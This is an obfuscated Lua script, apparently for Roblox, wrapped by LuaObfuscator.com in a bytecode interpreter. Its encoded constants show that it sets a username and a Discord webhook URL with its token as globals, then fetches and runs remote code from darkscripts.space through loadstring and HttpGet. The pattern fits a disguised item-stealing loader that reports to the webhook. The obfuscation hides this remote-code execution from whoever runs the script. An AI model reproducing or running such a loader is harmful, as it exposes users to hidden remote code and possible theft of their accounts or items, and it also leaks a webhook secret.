--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v99=0;local v100;while true do if (v99==1) then return v100;end if (v99==0) then v100=v5(v84,v19);v19=nil;v99=1;end end else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -((2192 -(1523 + 114)) + 64)))) + (932 -(857 + 74)))) ;return v85-(v85%(569 -(367 + 201))) ;else local v86=(929 -(193 + 21 + 713))^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21() local v34=0 -(0 -0) ;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1271 -(226 + 1044) ;end end end local function v22() local v36=0;local v37;local v38;while true do if (v36==(118 -(32 + 85))) then return (v38 * (251 + 5)) + v37 ;end if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + ((1759 -800) -((1242 -(87 + 263)) + (245 -(67 + 113)))) );v18=v18 + (4 -2) ;v36=1 -0 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;return (v42 * (12338840 + 4438376)) + (v41 * 65536) + (v40 * (1017 -761)) + v39 ;end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(953 -(802 + 150))) then v46=2 -1 ;v47=(v20(v45,1,9 + 11 ) * ((3 -1)^(57 -25))) + v44 ;v43=432 -(44 + 386) ;end if (v43==(1489 -(998 + 488))) then if (v48==(0 + 0)) then if (v47==(0 + 0 + 0)) then return v49 * (997 -(915 + 82)) ;else v48=2 -1 ;v46=0 -(0 -0) ;end elseif (v48==(1193 + (2601 -(760 + 987)))) then return ((v47==(0 -(1913 -(1789 + 124)))) and (v49 * ((3 -2)/(1187 -(1069 + 118))))) or (v49 * NaN) ;end return v8(v49,v48-(2320 -1297) ) * (v46 + (v47/((4 -2)^(113 -61)))) ;end if (v43==(0 + 0)) then v44=v23();v45=v23();v43=1;end if (v43==(1 + 1)) then v48=v20(v45,37 -16 ,1111 -(1020 + 60) );v49=((v20(v45,32 + 0 )==(3 -2)) and  -((1558 -(745 + 21)) -(127 + 241 + 423))) or (3 -2) ;v43=(57 -36) -(10 + 8) ;end end end local function v25(v50) local v51=0 -0 ;local v52;local v53;while true do if (v51==(1 + 2)) then return v6(v53);end if (v51==(0 + 0)) then v52=nil;if  not v50 then local v96=0;while true do if (v96==(1055 -((788 -(376 + 325)) + 968))) then v50=v23();if (v50==(0 -0)) then return "";end break;end end end v51=1 + (0 -0) ;end if (v51==(4 -2)) then v53={};for v90=1414 -(447 + 966) , #v52 do v53[v90]=v2(v1(v3(v52,v90,v90)));end v51=3;end if (v51==(2 -1)) then v52=v3(v16,v18,(v18 + v50) -(1818 -(1703 + 114)) );v18=v18 + v50 ;v51=2;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0 -0 ;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do local v68=(function() return 0;end)();while true do if ((0 + 0)==v68) then if (1~=v54) then else local v97=(function() return 0;end)();while true do if (v97==1) then v61=(function() return {};end)();for v114= #" ",v60 do local v115=(function() return 0 + 0 ;end)();local v116=(function() return;end)();local v117=(function() return;end)();local v118=(function() return;end)();while true do if (v115==(0 -0)) then v116=(function() return 0;end)();v117=(function() return nil;end)();v115=(function() return 1 -0 ;end)();end if (v115==1) then v118=(function() return nil;end)();while true do if (v116==1) then if (v117== #"[") then v118=(function() return v21()~=(0 + 0) ;end)();elseif (v117==(1638 -(1373 + 263))) then v118=(function() return v24();end)();elseif (v117~= #"-19") then else v118=(function() return v25();end)();end v61[v114]=(function() return v118;end)();break;end if (v116~=0) then else v117=(function() return v21();end)();v118=(function() return nil;end)();v116=(function() return 1;end)();end end break;end end end v97=(function() return 2;end)();end if (v97==2) then v54=(function() return 1002 -(451 + 549) ;end)();break;end if (v97==0) then v59=(function() return {v56,v57,nil,v58};end)();v60=(function() return v23();end)();v97=(function() return 1;end)();end end end if (v54==0) then v55=(function() return function(v104,v105,v106) local v107=(function() return 0 + 0 ;end)();local v108=(function() return;end)();while true do if ((0 -0)==v107) then v108=(function() return 0 -0 ;end)();while true do if ((1384 -(746 + 638))~=v108) then else v104[v105-#"}" ]=(function() return v106();end)();return v104,v105,v106;end end break;end end end;end)();v56=(function() return {};end)();v57=(function() return {};end)();v58=(function() return {};end)();v54=(function() return 1 + 0 ;end)();end v68=(function() return 1 -0 ;end)();end if (v68==(342 -(218 + 123))) then if ((1583 -(1535 + 46))==v54) then v59[ #"gha"]=(function() return v21();end)();for v101= #",",v23() do local v102=(function() return v21();end)();if (v20(v102, #"<", #".")==(0 + 0)) then local v109=(function() return 0;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v109~=2) then else while true do if (v110==2) then local v167=(function() return 0;end)();local v168=(function() return;end)();while true do if (v167==0) then v168=(function() return 0;end)();while true do if (0==v168) then if (v20(v112, #"/", #">")== #":") then v113[1 + 1 ]=(function() return v61[v113[562 -(306 + 254) ]];end)();end if (v20(v112,1 + 1 ,3 -1 )== #".") then v113[ #"gha"]=(function() return v61[v113[ #"nil"]];end)();end v168=(function() return 1;end)();end if (v168~=1) then else v110=(function() return  #"91(";end)();break;end end break;end end end if (v110~=(1467 -(899 + 568))) then else local v169=(function() return 0 + 0 ;end)();local v170=(function() return;end)();while true do if (v169==(0 -0)) then v170=(function() return 0;end)();while true do if (v170==(603 -(268 + 335))) then v111=(function() return v20(v102,292 -(60 + 230) , #"gha");end)();v112=(function() return v20(v102, #"asd1",6);end)();v170=(function() return 1;end)();end if (v170~=1) then else v110=(function() return  #"|";end)();break;end end break;end end end if (v110~= #".") then else local v171=(function() return 0;end)();local v172=(function() return;end)();while true do if (v171==(572 -(426 + 146))) then v172=(function() return 0;end)();while true do if (v172~=(0 + 0)) then else v113=(function() return {v22(),v22(),nil,nil};end)();if (v111==(1456 -(282 + 1174))) then local v185=(function() return 811 -(569 + 242) ;end)();local v186=(function() return;end)();while true do if (v185==(0 -0)) then v186=(function() return 0;end)();while true do if ((0 + 0)~=v186) then else v113[ #"gha"]=(function() return v22();end)();v113[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v111== #"|") then v113[ #"xxx"]=(function() return v23();end)();elseif (v111==(1026 -(706 + 318))) then v113[ #"gha"]=(function() return v23() -((1253 -(721 + 530))^(1287 -(945 + 326))) ;end)();elseif (v111== #"gha") then local v191=(function() return 0;end)();local v192=(function() return;end)();while true do if (v191==0) then v192=(function() return 0;end)();while true do if (v192~=0) then else v113[ #"nil"]=(function() return v23() -((4 -2)^16) ;end)();v113[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v172=(function() return 1;end)();end if (v172==(1 + 0)) then v110=(function() return 702 -(271 + 429) ;end)();break;end end break;end end end if (v110~= #"nil") then else if (v20(v112, #"-19", #"-19")~= #"\\") then else v113[ #"asd1"]=(function() return v61[v113[ #"0836"]];end)();end v56[v101]=(function() return v113;end)();break;end end break;end if (v109==(1 + 0)) then local v145=(function() return 0;end)();while true do if (v145==(1500 -(1408 + 92))) then v112=(function() return nil;end)();v113=(function() return nil;end)();v145=(function() return 1;end)();end if (v145==1) then v109=(function() return 1088 -(461 + 625) ;end)();break;end end end if (v109==(1288 -(993 + 295))) then local v146=(function() return 0 + 0 ;end)();while true do if (v146==1) then v109=(function() return 1172 -(418 + 753) ;end)();break;end if (v146==(0 + 0)) then v110=(function() return 0;end)();v111=(function() return nil;end)();v146=(function() return 1;end)();end end end end end end for v103= #"|",v23() do v57,v103,v28=(function() return v55(v57,v103,v28);end)();end return v59;end break;end end end end local function v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[1 + 1 ];local v67=v62[2 + 1 ];return function(...) local v69=v65;local v70=v66;local v71=v67;local v72=v27;local v73=1;local v74= -((1330 -(797 + 532)) + 0);local v75={};local v76={...};local v77=v12("#",...) -(1770 -(1749 + 20)) ;local v78={};local v79={};for v87=0 + 0 ,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + (1323 -(1249 + 73)) ];else v79[v87]=v76[v87 + 1 + 0 + 0 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1146 -(466 + 679) ];if (v82<=(21 -12)) then if (v82<=(11 -7)) then if (v82<=(1901 -(106 + 1794))) then if (v82==(0 + 0 + 0)) then v73=v81[1 + 2 ];else local v120=v81[5 -(6 -3) ];local v121=v79[v81[7 -4 ]];v79[v120 + (115 -((1206 -(373 + 829)) + 110)) ]=v121;v79[v120]=v121[v81[588 -(57 + 527) ]];end elseif (v82<=(1429 -(41 + 1386))) then v79[v81[105 -(17 + 86) ]]();elseif (v82>((734 -(476 + 255)) + 0)) then local v147=0 -0 ;local v148;local v149;local v150;local v151;while true do if ((3946>=3743) and ((0 -0)==v147)) then v148=v81[168 -(122 + 44) ];v149,v150=v72(v79[v148](v13(v79,v148 + (1 -0) ,v81[3])));v147=3 -2 ;end if (v147==(1 + 0)) then v74=(v150 + v148) -1 ;v151=0 + (1130 -(369 + 761)) ;v147=3 -1 ;end if (v147==2) then for v176=v148,v74 do local v177=65 -(30 + 35) ;while true do if ((0==v177) or (1335>=3306)) then v151=v151 + 1 ;v79[v176]=v149[v151];break;end end end break;end end else v79[v81[2 + 0 ]]=v81[3];end elseif ((4844>2253) and (v82<=(1263 -(1043 + 124 + 90)))) then if (v82==(18 -13)) then local v125=1212 -(323 + 889) ;local v126;while true do if (v125==(0 -0)) then v126=v81[582 -(361 + 219) ];v79[v126]=v79[v126](v13(v79,v126 + (321 -((96 -43) + 267)) ,v74));break;end end else v79[v81[1 + 1 ]]();end elseif (v82<=(420 -(15 + (753 -355)))) then v79[v81[2]]=v64[v81[985 -(18 + 964) ]];elseif ((452==452) and (v82==(30 -22))) then v79[v81[240 -(64 + 174) ]]=v81[3];else local v156=v81[2];v79[v156]=v79[v156](v13(v79,v156 + 1 ,v74));end elseif ((v82<=(9 + 5)) or (4557<2087)) then if ((3874==3874) and (v82<=(7 + 4))) then if (v82>10) then if (v79[v81[852 -(20 + 830) ]]==v81[4 + 0 ]) then v73=v73 + (127 -(116 + 10)) ;else v73=v81[1 + 2 ];end else local v129=v81[740 -(542 + 196) ];local v130=v79[v81[6 -3 ]];v79[v129 + 1 + 0 ]=v130;v79[v129]=v130[v81[1 + 2 + 1 ]];end elseif (v82<=(5 + 7)) then local v134=0 -0 ;local v135;local v136;local v137;local v138;while true do if (v134==(2 -1)) then v74=(v137 + v135) -(1552 -((1667 -541) + 425)) ;v138=0;v134=407 -(118 + 287) ;end if (((7 -(341 -(144 + 192)))==v134) or (1938>4935)) then for v164=v135,v74 do local v165=0;while true do if (v165==(1121 -(118 + 1003))) then v138=v138 + (2 -1) ;v79[v164]=v136[v138];break;end end end break;end if (v134==(216 -(42 + 174))) then v135=v81[379 -(142 + 235) ];v136,v137=v72(v79[v135](v13(v79,v135 + (4 -3) ,v81[3])));v134=1 + 0 ;end end elseif ((v82==(990 -(553 + 424))) or (4255<3423)) then if ((1454<=2491) and (v79[v81[3 -1 ]]==v81[4 + 0 ])) then v73=v73 + 1 + 0 ;else v73=v81[3];end else v73=v81[2 + 1 ];end elseif (v82<=(7 + 9)) then if (v82>(9 + 6)) then v79[v81[4 -2 ]]=v64[v81[3]];else v64[v81[7 -4 ]]=v79[v81[4 -2 ]];end elseif (v82<=17) then v64[v81[1 + 0 + 2 ]]=v79[v81[9 -(6 + 1) ]];elseif (v82==18) then do return;end else do return;end end v73=v73 + (754 -(239 + 219 + 295)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031F3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F706574676F03083Q00557365726E616D65030D3Q004772616E745F6A6F7264616E3503073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F3133313530393834333637302Q3538373239322F776B65526864463952785176683959646D6A726677494D43572Q706D31734C41674E575152576D5F5A416737436E4F50705F35324D4850353668586B564648326849754100143Q0012033Q00013Q00260B3Q000B0001000200044Q000B0001001207000100033Q001207000200043Q00200A000200020005001203000400064Q0004000200044Q000500013Q00022Q000600010001000100044Q0013000100260B3Q00010001000100044Q00010001001203000100083Q00120F000100073Q0012030001000A3Q00120F000100093Q0012033Q00023Q00044Q000100012Q00123Q00017Q00",v9(),...);
